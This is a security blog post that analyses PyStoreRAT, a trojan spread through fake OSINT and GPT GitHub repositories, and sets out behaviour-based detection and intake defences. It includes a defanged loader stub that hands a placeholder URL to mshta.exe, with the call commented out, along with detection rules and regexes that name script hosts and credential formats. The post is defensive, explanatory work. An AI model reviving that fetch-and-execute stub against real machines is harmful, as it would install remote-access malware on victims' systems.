PyStoreRAT spreads via fake OSINT and GPT GitHub repos. Learn the attack chain and how AI-driven cybersecurity can detect and block repo-based malware.

Fake GitHub AI Tools: How PyStoreRAT Gets In
Most companies still treat GitHub like a trusted “app store for code.” Attackers are betting on that assumption—and they’re winning.
A recent campaign used GitHub repositories disguised as OSINT tools and GPT utilities to drop a new remote access trojan (RAT) called PyStoreRAT. The trick wasn’t a zero-day exploit. It was social proof: trending repos, inflated stars and forks, and “maintenance commits” that quietly swapped in a malicious loader after the project looked popular.
This post is part of our AI in Cybersecurity series, and it’s a useful reality check: bad actors are weaponizing the same AI-adjacent buzzwords your teams search for—“GPT wrapper,” “OSINT automation,” “DeFi bot”—to get execution on developer and analyst laptops. The good news is that AI-driven cybersecurity systems are uniquely suited to spot this pattern, because the campaign’s strength (scale and repetition) is also its weakness.
What PyStoreRAT is (and why this campaign works)
PyStoreRAT is a modular, multi-stage RAT delivered through tiny Python/JavaScript stubs hosted on GitHub. Those stubs download a remote HTML Application (HTA) and execute it with mshta.exe, a Windows utility that still shows up in real environments often enough to be abused.
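To make that concrete, here is a defanged sketch of what a few-line stub in this pattern can look like. It is a reconstruction for illustration, not the campaign's actual code: the URL is a placeholder and the execution call is deliberately commented out.

```python
# Defanged illustration only: placeholder URL, execution commented out.
import subprocess  # used by the commented-out call below

REMOTE_HTA = "https://example.invalid/update.hta"  # hypothetical stager URL

# The stub's entire job is to hand a remote HTA to a trusted Windows
# binary. mshta.exe fetches and executes the HTA itself, so nothing
# obviously malicious has to live in the repo at publish time.
# subprocess.run(["mshta.exe", REMOTE_HTA])
```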
Here’s why that matters: defenders often focus on malicious binaries. This campaign focuses on scripts and living-off-the-land execution—a path where signatures are weak, and where a repo can look “fine” at a quick glance.
The deception: “real enough” repos
The repositories weren’t sophisticated software. Many showed static menus, placeholder behavior, or minimal functionality. That’s intentional.
Attackers don’t need a great OSINT tool. They need a repo that:
- Matches what their target is already searching for (OSINT, GPT, security utilities)
- Looks active enough to earn trust
- Gets enough engagement (real or faked) to reduce skepticism
This is exactly the kind of deception AI hype enables. When teams are under pressure to “try that new GPT helper,” their risk tolerance quietly increases.
The payload chain: small loader, big consequences
The initial code in these repos was only a few lines. Its whole job: fetch an HTA remotely and execute it. From there, PyStoreRAT can pull down and run additional modules in multiple formats—EXE, DLL, PowerShell, MSI, Python, JavaScript, HTA.
A modular RAT is a practical choice for attackers because it adapts:
- Different environments block different things
- Payloads can be swapped without changing the repo
- “Just-in-time” malware reduces the chance the full toolset is caught early
How the GitHub “maintenance commit” becomes a supply chain attack
This campaign behaves like a supply chain attack, even though it’s not targeting a single vendor dependency. It targets the human habit of pulling tools from GitHub, running them locally, and trusting repo momentum.
Researchers observed a pattern where threat actors:
- Publish a repo that appears legitimate
- Let it sit (or slowly gain traction)
- Add malicious code later via a “maintenance” commit
That last step is the punchline: developers often skim the README, maybe glance at the star count, and run the script. They rarely audit commit history—especially if the repo already “seems established.”
Social proof as an attack primitive
Artificially inflating stars and forks is not just vanity. It’s a conversion tactic.
When a repo trends, it’s effectively receiving free distribution through:
- GitHub’s discovery surfaces
- YouTube “tool showcase” videos
- X posts and threads in OSINT/security communities
Attackers don’t need to phish credentials if they can persuade you to execute the first-stage loader yourself.
What PyStoreRAT does after execution
Once PyStoreRAT lands, it behaves like a full remote control framework with follow-on theft built in. It profiles the system, checks privileges, and fetches remote commands.
Targeting crypto wallets and sensitive files
The campaign specifically looks for cryptocurrency wallet-related artifacts, including files associated with products like Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. That’s a clear monetization path: steal wallet data, drain funds, move on.
Even if your company isn’t “in crypto,” plenty of developers and analysts have personal wallets on work machines. And attackers know that.
Evasion: security product awareness
The loader collects installed antivirus products and checks for strings like “Falcon” and “Reason”—suggesting explicit awareness of certain endpoint stacks.
Two points worth taking seriously:
- This isn’t “spray and pray” malware written in isolation; it’s written with real enterprise controls in mind.
- Endpoint detection often triggers late in script-heavy chains, especially when execution is split across processes like cmd.exe and mshta.exe.
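It takes very little effort to collect that AV inventory: the standard Windows Security Center namespace exposes it to any local script. A minimal sketch of the same lookup, for your own visibility (workstation SKUs only; servers don't expose SecurityCenter2):

```python
# Sketch: reproduce the AV inventory any local script can collect.
# SecurityCenter2 exists on Windows workstation SKUs, not servers.
import subprocess

out = subprocess.run(
    ["powershell", "-NoProfile", "-Command",
     "Get-CimInstance -Namespace root/SecurityCenter2 "
     "-ClassName AntiVirusProduct | "
     "Select-Object -ExpandProperty displayName"],
    capture_output=True, text=True,
).stdout

# If "Falcon" or similar shows up here, assume the loader sees it too.
print(out.strip().splitlines())
```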
Persistence and command execution
Persistence is achieved via a scheduled task disguised as an NVIDIA self-update. After that, the RAT can pull commands and perform actions such as:
- Download and execute EXEs (including infostealers such as Rhadamanthys)
- Run PowerShell in memory
- Load DLLs via rundll32.exe
- Execute JavaScript dynamically in memory (including use of eval())
- Install MSI packages
- Spread via removable drives by replacing documents with malicious LNK files
- Remove traces by deleting the scheduled task
That last bullet is the part most teams overlook: cleanup is a capability. If your detection and response process relies on “we’ll find it later in forensics,” attackers are actively trying to make sure you don’t.
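One way to hunt for this specific persistence trick is to sweep scheduled tasks for GPU/driver-update naming that launches script interpreters. A minimal sketch, assuming Windows with schtasks in its default English column names; the keyword lists are illustrative assumptions, not confirmed campaign IOCs:

```python
# Hunting sketch (Windows): flag scheduled tasks with GPU/driver-update
# naming that actually launch script interpreters.
import csv
import io
import subprocess

SUSPECT_NAMES = ("nvidia", "gpu", "driver update")  # hypothetical themes
SCRIPT_HOSTS = ("mshta", "wscript", "cscript", "powershell", "python")

out = subprocess.run(
    ["schtasks", "/query", "/fo", "CSV", "/v"],
    capture_output=True, text=True, check=True,
).stdout

for row in csv.DictReader(io.StringIO(out)):
    name = (row.get("TaskName") or "").lower()
    action = (row.get("Task To Run") or "").lower()
    if name == "taskname":  # schtasks repeats header rows; skip them
        continue
    if any(k in name for k in SUSPECT_NAMES) and any(h in action for h in SCRIPT_HOSTS):
        print(f"review: {row['TaskName']} -> {row['Task To Run']}")
```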
Where AI-driven cybersecurity actually helps (and where it doesn’t)
AI doesn’t fix risky behavior, but it’s excellent at detecting patterns humans miss at scale. This campaign is perfect for AI-based defense because it’s repetitive: lots of similar repos, similar stubs, similar execution flows.
What to detect: behavior beats signatures
If you’re defending against trojanized GitHub repos, you want detection that’s centered on execution behavior, not file hashes.
High-signal behaviors in this campaign include:
- A developer tool (Python/Node) spawning Windows script execution (mshta.exe)
- Network calls to fetch remote HTA/JS content immediately before mshta.exe execution
- Scheduled task creation with suspicious naming (e.g., “GPU update” themes) shortly after script execution
- Rapid “multi-loader” activity: cmd.exe → mshta.exe → script engine → download → execute
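As a sketch of how the first behavior above translates into a rule, here is a minimal check against process-creation telemetry. The event field names (parent_image, image, command_line) are assumptions modeled on typical EDR schemas; adapt them to your product:

```python
# Behavior rule sketch: developer tooling handing execution to mshta.exe.
# Field names mirror common EDR process-creation telemetry (assumed schema).
DEV_TOOLS = {"python.exe", "node.exe", "cmd.exe"}

def is_suspicious_spawn(event: dict) -> bool:
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    child = event.get("image", "").lower().rsplit("\\", 1)[-1]
    cmdline = event.get("command_line", "").lower()
    # A dev tool spawning mshta.exe with a URL on the command line matches
    # the fetch-and-execute chain described above.
    return child == "mshta.exe" and parent in DEV_TOOLS and "http" in cmdline

# Hypothetical event:
print(is_suspicious_spawn({
    "parent_image": r"C:\Python312\python.exe",
    "image": r"C:\Windows\System32\mshta.exe",
    "command_line": "mshta.exe https://example.invalid/u.hta",
}))  # True
```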
AI-based anomaly detection shines when it can baseline “normal developer workstation behavior” and flag:
- Rare parent/child process chains
- Unusual script interpreter usage
- New scheduled tasks created outside of patch windows
What to detect: repo and commit risk signals
Security teams can also apply AI to source provenance—not to judge code quality, but to score risk.
Signals worth modeling:
- Repos that suddenly spike in stars/forks faster than similar projects
- New or previously dormant accounts publishing multiple “security tools” rapidly
- “Maintenance commits” that introduce outbound network retrieval + execution
- Tools that don’t do what they claim (e.g., static menus, placeholder functions)
A practical stance: treat “popular” as a weak trust signal. Treat “executable behavior” as the strong one.
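Here is a toy scoring sketch for that stance. Every field name and threshold is an illustrative assumption; real inputs would come from the GitHub API plus your own intake telemetry:

```python
# Toy repo-intake scoring. All fields and thresholds are illustrative.
def repo_risk_score(repo: dict) -> int:
    score = 0
    if repo["stars_gained_7d"] > 10 * max(repo["stars_gained_prev_30d"], 1):
        score += 3  # engagement spike out of proportion to history
    if repo["account_age_days"] < 30 and repo["published_tool_count"] > 2:
        score += 3  # fresh account mass-publishing "security tools"
    if repo["commit_adds_network_and_exec"]:
        score += 5  # the "maintenance commit" pattern; weight it heavily
    if repo["claimed_features_stubbed"]:
        score += 2  # static menus, placeholder functions
    return score    # e.g., require manual review at score >= 5
```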
Where AI won’t save you
If your process allows anyone to pull random repos and run them on endpoints with broad permissions, AI detection becomes a backstop—not a solution.
The strongest control is still boring:
- Don’t run unvetted tooling on production-connected machines
- Use least privilege
- Put risky research tooling in an isolated environment
AI should enforce and automate those rules, not replace them.
A practical defense playbook for OSINT and GPT tooling
If your analysts and developers rely on OSINT tooling and GPT utilities, you need a lightweight gate that doesn’t kill productivity. Here’s what works in real teams.
1) Create a “research sandbox” standard
Make it normal to run new tools in an environment that can’t hurt you.
- Isolated VM or ephemeral dev container
- No access to corporate credentials by default
- No access to internal network segments
- Logging turned up (process creation + DNS + network egress)
If someone complains this slows them down, remind them how much slower incident response is.
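A minimal sketch of the ephemeral-container variant, assuming Docker is available; the image, flags, and entry point are all illustrative:

```python
# Ephemeral research sandbox sketch, assuming Docker. Image, flags, and
# entry point are illustrative; adapt to your tooling.
import os
import subprocess

def run_in_sandbox(repo_dir: str, entry: str) -> None:
    subprocess.run([
        "docker", "run", "--rm",
        "--network", "none",  # no egress: first-stage loaders fail here
        "-v", f"{os.path.abspath(repo_dir)}:/work:ro",  # code mounted read-only
        "-w", "/work",
        "python:3.12-slim",
        "python", entry,
    ], check=False)

# run_in_sandbox("./new-osint-tool", "main.py")
```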
2) Enforce execution controls for script interpreters
mshta.exe is a recurring villain because it’s a built-in execution path for remote HTA content.
Controls to consider:
- Restrict or monitor mshta.exe execution on endpoints that don’t need it
- Alert on mshta.exe launched by python.exe, node.exe, or cmd.exe
- Require code signing or allowlisting for internal automation scripts
3) Add “commit delta review” to your internal tool intake
Teams often do a one-time review of a repo and then forget it. This campaign exploits that.
A better pattern:
- Pin to a specific commit hash
- Re-review when updating
- Diff for: new network calls, new process execution, obfuscation, encoded blobs
Even a five-minute diff review catches most loader stubs.
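That diff review can be partially automated. A minimal sketch, assuming git is on PATH; the regex is a starting point, not a complete detection:

```python
# Automate the diff review: compare the pinned commit to the update
# candidate and surface loader-ish additions.
import re
import subprocess

RISKY = re.compile(
    r"(urllib|requests\.|https?://|subprocess|os\.system|"
    r"mshta|rundll32|powershell|base64|eval\()",
    re.IGNORECASE,
)

def risky_delta(repo_path: str, pinned: str, candidate: str) -> list[str]:
    diff = subprocess.run(
        ["git", "-C", repo_path, "diff", pinned, candidate],
        capture_output=True, text=True, check=True,
    ).stdout
    # Only added lines matter for this check.
    return [line for line in diff.splitlines()
            if line.startswith("+") and not line.startswith("+++")
            and RISKY.search(line)]

# Usage: risky_delta("./tool-repo", "abc1234", "origin/main")
```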
4) Use AI to triage, not to rubber-stamp
If you use AI assistants for code review, set the expectation clearly:
- AI can summarize behavior and highlight suspicious patterns
- AI should not be treated as a security approval
- Human review is still required for anything that executes or downloads code
I’ve found the best workflow is: AI flags risk areas fast, then a human validates the top 5% most suspicious changes.
5) Prepare detection for follow-on stealers
PyStoreRAT’s chain includes deploying an infostealer (Rhadamanthys). That means you should assume:
- Browser credential theft
- Session/token theft
- Developer secrets exposure (API keys, SSH keys, cloud credentials)
If you’re not already scanning endpoints and repos for exposed secrets, you’re leaving money on the table—and attackers will collect it.
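If you need a starting point, here is a bare-bones sweep for a few well-known secret formats. The patterns are common public ones shown for illustration; in production, use a maintained scanner such as gitleaks or trufflehog rather than hand-rolled regexes:

```python
# Bare-bones secrets sweep. Patterns are common public formats, shown
# for illustration; prefer a maintained scanner in production.
import pathlib
import re

PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "github_token": re.compile(r"ghp_[A-Za-z0-9]{36}"),
}

def scan(root: str) -> None:
    for path in pathlib.Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for name, rx in PATTERNS.items():
            if rx.search(text):
                print(f"{name}: {path}")

scan(".")
```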
What this means for 2026 security planning
PyStoreRAT is a reminder that “AI tools” are now a phishing theme, a malware wrapper, and a distribution channel. Security teams that treat developer endpoints as semi-trusted will keep getting surprised.
The practical shift I want more orgs to make is simple: treat code acquisition (GitHub repos, packages, “helper scripts”) as part of your attack surface—then apply AI-driven cybersecurity where it excels: anomaly detection, behavioral correlation, and automated triage.
If your team is rolling out new OSINT automation or GPT utilities in 2026, ask one uncomfortable question before you scale adoption: Do we have a way to detect when a “tool” is actually a loader?